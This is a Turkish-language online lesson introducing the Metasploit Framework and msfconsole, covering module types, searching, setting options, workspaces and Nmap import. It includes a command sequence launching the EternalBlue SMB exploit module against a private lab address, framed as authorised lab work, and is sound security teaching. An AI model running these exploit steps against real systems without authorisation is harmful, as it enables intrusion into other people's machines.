0Pricing
Cyber Security Academy · Ders

Metasploit Mimarisi ve msfconsole

msfconsole'da gezinin, istismar, yük ve modül yapısını anlayın ve seçenekleri yapılandırın.

Metasploit Mimarisi ve msfconsole, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 1. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Metasploit nedir?

Metasploit Framework, istismarları geliştirmek, sınamak ve çalıştırmak için birleşik bir arayüz sağlayan açık kaynaklı bir sızma sınaması platformudur. Yetkili laboratuvar ortamlarında istismar gerçekleştirmek için sektör standardı araçtır.

Metasploit Bileşenleri

Temel bileşenler: msfconsole (etkileşimli CLI), msfvenom (yük oluşturucu), Metasploit DB (ana bilgisayarları ve oturumları depolamak için PostgreSQL) ve Armitage (GUI ön yüzü).

msfconsole'ı Başlatma

msfconsole'ı başlatın ve veritabanını başlatın. İstem msf6 > olarak değişir. Sekme tamamlaması tüm komutlarda, modül adlarında ve seçeneklerde çalışır.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Modül Türleri

Metasploit yetenekleri şu modül türleri halinde düzenler: exploit (güvenlik açığına özgü saldırı kodu), payload (istismardan sonra çalışan kod), auxiliary (tarayıcılar ve bulanıklaştırıcılar), post (istismar sonrası), encoder ve nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Modül Arama

search komutu modülleri ada, CVE'ye, platforma veya dereceye göre filtreler. Modül derecesi güvenilirliği gösterir: Mükemmel > Çok iyi > İyi > Normal > Ortalama > Düşük.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

İstismar Modülü Kullanma

use ile bir modül seçin, gerekli seçenekleri show options ile görüntüleyin, değerleri set ile ayarlayın ve run veya exploit ile çalıştırın.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Genel Seçenekleri Ayarlama

setg, sonraki tüm modüller için seçenekleri genel olarak ayarlar. Bu, etkileşim boyunca sabit kalan LHOST, LPORT ve RHOSTS için kullanışlıdır.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Yardımcı Modüller

Yardımcı modüller yük göndermeden tarama, numaralandırma ve bulanıklaştırma işlemleri gerçekleştirir. Örnekler: SMB sürüm tarayıcısı, SSH oturum açma kaba kuvveti ve HTTP dizin tarayıcısı.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Çalışma Alanı Yönetimi

Çalışma alanları, her etkileşim için tarama verilerini ve oturumları düzenler. Verileri ayrı tutmak için her değerlendirmenin başında yeni bir çalışma alanı oluşturun.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Nmap Entegrasyonu

Ana bilgisayarlar ve hizmetler tablolarını doldurmak ve hedefli modül seçimini etkinleştirmek için Nmap XML tarama sonuçlarını doğrudan Metasploit veritabanına aktarın.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Yardım ve Belgelendirme

Her modülün yerleşik belgeleri vardır. Modül açıklamasını, güvenilirlik derecesini, başvuruları (CVE'ler ve güvenlik duyuruları) ve gerekli seçenekleri okumak için info komutunu kullanın.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Hızlı Kontrol

msfconsole'da bir modülü hangi komut seçer?

Özet: Metasploit Mimarisi

msfconsole merkezi merkezdir: modülleri arayın, seçenekleri ayarlayın, istismarları çalıştırın ve oturumları yönetin. Her zaman adlandırılmış bir çalışma alanı içinde çalışın, veritabanını doldurmak için Nmap sonuçlarını aktarın ve herhangi bir şeyi çalıştırmadan önce modül bilgilerini okuyun; neyi, neden çalıştırdığınızı anlayın.

Sıkça Sorulan Sorular

“Metasploit Mimarisi ve msfconsole” dersi ücretsiz mi?

Evet — “Metasploit Mimarisi ve msfconsole” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Metasploit Mimarisi ve msfconsole” dersinde ne öğreneceğim?

msfconsole'da gezinin, istismar, yük ve modül yapısını anlayın ve seçenekleri yapılandırın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 1. dersidir.

“Metasploit Mimarisi ve msfconsole” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Metasploit Mimarisi ve msfconsole
  2. Bilinen Bir Güvenlik Açığını İstismar Etme
  3. Yükler: Aşamalı ve Aşamasız, Meterpreter
  4. İstismar Sonrası: Pivot ve Kalıcılık
← Cyber Security Academy Sayfasına Dön